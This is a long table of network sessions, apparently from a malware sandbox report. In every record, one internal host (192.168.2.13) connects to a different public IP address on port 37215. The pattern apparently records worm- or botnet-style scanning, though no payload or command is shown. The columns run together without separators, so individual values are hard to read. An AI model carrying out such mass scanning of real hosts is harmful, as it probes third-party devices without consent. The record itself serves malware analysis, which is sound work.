                                                  10758192.168.2.134177478.90.50.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10759192.168.2.1354886221.196.209.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10760192.168.2.1354586157.114.2.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10761192.168.2.135904641.66.61.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10762192.168.2.134366441.40.151.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10763192.168.2.1360150157.234.23.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10764192.168.2.1347158157.239.129.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10765192.168.2.1340810157.129.46.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10766192.168.2.1333582157.101.224.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10767192.168.2.134392241.248.220.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10768192.168.2.134220689.20.35.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10769192.168.2.133509441.220.86.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10770192.168.2.135274241.9.90.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10771192.168.2.134577017.215.38.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10772192.168.2.1356334197.144.87.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10773192.168.2.134360241.145.165.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10774192.168.2.135075041.117.205.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10775192.168.2.1346532157.143.116.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10776192.168.2.135004441.178.216.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10777192.168.2.1360998197.22.254.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10778192.168.2.1359294197.230.183.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10779192.168.2.135480641.147.28.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10780192.168.2.1351882197.243.139.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10781192.168.2.1342856197.7.217.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10782192.168.2.1340642157.170.77.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10783192.168.2.133986841.243.204.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10784192.168.2.1342822170.74.223.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10785192.168.2.135652062.222.204.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10786192.168.2.136076841.198.196.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10787192.168.2.133563481.179.219.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10788192.168.2.1333094198.114.236.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10789192.168.2.133846841.188.18.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10790192.168.2.136066441.105.121.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10791192.168.2.135505041.12.136.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10792192.168.2.134495041.8.62.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10793192.168.2.1347250157.21.71.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10794192.168.2.1344398213.39.177.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10795192.168.2.133542641.59.123.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10796192.168.2.1351772157.194.80.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10797192.168.2.1345708157.230.163.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10798192.168.2.135630041.115.219.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10799192.168.2.1348968207.247.72.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10800192.168.2.134620641.140.222.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10801192.168.2.1352256197.227.203.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10802192.168.2.1353782122.10.252.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10803192.168.2.134397641.31.222.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10804192.168.2.1345762157.59.239.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10805192.168.2.1344084210.81.104.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10806192.168.2.1351278157.198.174.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10807192.168.2.1342840157.93.116.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10808192.168.2.133585841.56.126.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10809192.168.2.133462641.104.152.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10810192.168.2.1335604157.82.123.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10811192.168.2.1336108197.246.98.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10812192.168.2.1335772157.157.195.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10813192.168.2.134073041.43.241.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10814192.168.2.1347756157.114.218.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10815192.168.2.1360192157.248.86.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10816192.168.2.1360474157.167.99.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10817192.168.2.1360216197.83.203.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10818192.168.2.1346702157.38.143.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10819192.168.2.1336214157.254.232.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10820192.168.2.1343588157.4.7.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10821192.168.2.133748841.103.245.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10822192.168.2.1358826186.148.189.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10823192.168.2.135813241.242.70.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10824192.168.2.1360652109.103.160.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10825192.168.2.1358934157.112.65.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10826192.168.2.1351704197.130.191.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10827192.168.2.1334018157.203.4.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10828192.168.2.1338506190.5.51.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10829192.168.2.1339554197.194.158.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10830192.168.2.1358970157.93.55.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10831192.168.2.135210841.85.36.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10832192.168.2.1351526157.192.93.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10833192.168.2.1355496197.18.103.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10834192.168.2.1336446117.19.66.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10835192.168.2.1341114197.59.154.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10836192.168.2.1343880157.115.142.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10837192.168.2.1341148183.68.12.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10838192.168.2.1333650197.211.87.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10839192.168.2.1335290197.44.242.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10840192.168.2.1353820157.245.174.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10841192.168.2.135021885.30.175.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10842192.168.2.1348930197.245.38.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10843192.168.2.1352938197.48.238.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10844192.168.2.1356908157.228.87.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10845192.168.2.1359252197.145.69.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10846192.168.2.1356356157.40.32.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10847192.168.2.134012840.121.255.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10848192.168.2.1348850157.120.159.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10849192.168.2.1342594144.166.244.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10850192.168.2.1334772197.3.224.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10851192.168.2.1354262191.44.27.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10852192.168.2.1338388157.64.3.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10853192.168.2.134275841.227.196.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10854192.168.2.1333966121.118.250.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10855192.168.2.1343592197.244.245.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10856192.168.2.1349288157.203.206.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10857192.168.2.1332916157.175.229.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10858192.168.2.1336022157.24.235.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10859192.168.2.134180041.167.237.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10860192.168.2.1343796157.180.236.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10861192.168.2.1351670197.104.167.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10862192.168.2.134570472.160.158.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10863192.168.2.1357818157.195.0.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10864192.168.2.1336540197.246.21.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10865192.168.2.1356914197.79.246.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10866192.168.2.1357320157.154.214.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10867192.168.2.136002041.58.134.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10868192.168.2.135043280.23.137.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10869192.168.2.1353154157.165.123.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10870192.168.2.1360994197.145.13.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10871192.168.2.1355916157.136.164.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10872192.168.2.1342640157.47.171.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10873192.168.2.134680441.2.187.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10874192.168.2.135406041.85.221.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10875192.168.2.134167876.182.94.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10876192.168.2.1346840197.69.235.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10877192.168.2.134281641.226.235.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10878192.168.2.1344590168.38.169.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10879192.168.2.1338412197.208.143.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10880192.168.2.134772241.48.128.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10881192.168.2.1354080129.187.145.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10882192.168.2.1349470193.189.133.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10883192.168.2.1348488157.124.46.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10884192.168.2.134105848.226.82.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10885192.168.2.1341148157.8.183.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10886192.168.2.1343286157.208.128.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10887192.168.2.133430041.140.180.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10888192.168.2.135818641.244.183.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10889192.168.2.1346058157.75.167.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10890192.168.2.133943241.24.150.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10891192.168.2.1341672106.197.207.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10892192.168.2.1339206197.152.31.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10893192.168.2.1358834157.82.188.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10894192.168.2.1339978197.200.125.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10895192.168.2.1335364197.248.133.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10896192.168.2.136023841.152.34.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10897192.168.2.1354578157.117.0.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10898192.168.2.1347762157.114.14.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10899192.168.2.1338120157.174.233.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10900192.168.2.1353566206.193.12.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10901192.168.2.1334486197.97.231.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10902192.168.2.1345086157.96.52.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10903192.168.2.1347640157.193.242.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10904192.168.2.1342022157.11.194.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10905192.168.2.1358596211.150.10.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10906192.168.2.1347408138.204.57.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10907192.168.2.1340504157.58.147.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10908192.168.2.1338530197.135.57.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10909192.168.2.1349066197.240.94.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10910192.168.2.135997441.119.161.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10911192.168.2.1345276197.1.146.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10912192.168.2.1338262157.85.74.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10913192.168.2.135520241.131.194.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10914192.168.2.1356182126.238.65.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10915192.168.2.1338450157.15.196.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10916192.168.2.1337182197.112.26.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10917192.168.2.1340698106.125.134.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10918192.168.2.1332894197.72.16.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10919192.168.2.1337686169.181.33.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10920192.168.2.133360241.37.133.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10921192.168.2.135383841.7.190.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10922192.168.2.134591679.171.221.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10923192.168.2.134662248.216.186.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10924192.168.2.1358928197.159.101.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10925192.168.2.1339060157.251.98.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10926192.168.2.1352030157.249.30.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10927192.168.2.1341028140.161.80.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10928192.168.2.1358410157.177.67.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10929192.168.2.1345882175.240.178.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10930192.168.2.134758041.199.111.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10931192.168.2.133334292.190.50.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10932192.168.2.136098241.199.165.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10933192.168.2.1335920197.42.194.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10934192.168.2.1353464157.204.177.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10935192.168.2.133863441.198.192.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10936192.168.2.1342410197.238.241.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10937192.168.2.1355024157.197.152.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10938192.168.2.1347814197.31.242.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10939192.168.2.1341624197.170.44.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10940192.168.2.136032841.57.177.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10941192.168.2.134246041.43.35.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10942192.168.2.135341041.106.94.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10943192.168.2.134943441.226.157.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10944192.168.2.1349862162.149.108.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10945192.168.2.1342750197.125.20.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10946192.168.2.1359698210.18.4.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10947192.168.2.1353958157.66.114.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10948192.168.2.1355696157.222.36.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10949192.168.2.136041651.45.119.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10950192.168.2.1342330212.103.72.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10951192.168.2.1347622157.181.35.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10952192.168.2.133794641.153.211.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10953192.168.2.133374674.239.7.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10954192.168.2.1337592157.112.72.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10955192.168.2.134302241.37.148.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10956192.168.2.1344906107.105.153.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10957192.168.2.1360062197.59.193.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10958192.168.2.1350974157.72.88.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10959192.168.2.1335484157.43.184.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10960192.168.2.1346662157.17.89.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10961192.168.2.133984241.80.234.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10962192.168.2.1342784197.68.85.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10963192.168.2.1354314162.185.93.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10964192.168.2.133753241.167.83.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10965192.168.2.1345438220.49.77.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10966192.168.2.1360824197.5.119.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10967192.168.2.1346534197.207.114.5737215
